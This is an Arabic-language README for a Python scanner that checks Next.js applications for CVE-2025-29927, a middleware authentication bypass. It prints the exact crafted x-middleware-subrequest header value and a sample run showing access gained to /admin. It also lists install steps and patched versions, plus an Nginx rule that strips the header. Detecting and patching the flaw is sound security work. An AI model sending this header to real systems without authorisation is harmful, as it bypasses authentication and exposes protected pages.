
🔐 ماسح ذكي مبني على بايثون لثغرة CVE-2025-29927 — ثغرة تجاوز المصادقة في middleware الخاص بـ Next.js. يكتشف meta refresh وعمليات إعادة التوجيه المستندة إلى الكلمات المفتاحية والمزيد.
يساعد هذا الماسح الذكي المبني بلغة بايثون في اكتشاف الثغرة CVE-2025-29927 في تطبيقات Next.js — وهي عبارة عن تجاوز حرج للوسيطة (middleware) يسمح للمهاجمين بتخطي المصادقة باستخدام ترويسة HTTP مصممة بعناية.
🧠 لا تكتشف الأداة عمليات إعادة التوجيه عبر HTTP فحسب، بل أيضًا آليات إعادة التوجيه من جانب العميل مثل
<meta http-equiv="refresh">، وعمليات إعادة التوجيه القائمة على الكلمات المفتاحية لتسجيل الدخول، وتجاوزات المصادقة الصامتة.
x-middleware-subrequest<meta refresh>login وsign in وauthentication$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
إذا كان تطبيقك متأثرًا، فاتبع ما يلي:
v15.2.3 أو أحدث (أو 14.2.25+ / 13.5.7+)x-middleware-subrequest عند الحافة (مثل Nginx):proxy_set_header x-middleware-subrequest "";
تسمح الثغرة CVE-2025-29927 للمهاجمين بتجاوز فحوصات الوسيطة في Next.js عن طريق التلاعب بترويسة x-middleware-subrequest بقيم مصممة مثل:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
في الإصدارات المتأثرة، يؤدي هذا إلى تعطيل تنفيذ الوسيطة تمامًا — مما يسمح بالوصول المباشر إلى المسارات المحمية مثل /dashboard و/admin وما إلى ذلك.
تتم صيانة الأداة بواسطة: @mrzblackhat
لا تتردد في التواصل معي على تيليجرام للاقتراحات أو التحسينات أو المساهمات.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
هذه الأداة مقدمة لأغراض تعليمية وبحثية فقط. استخدمها بمسؤولية.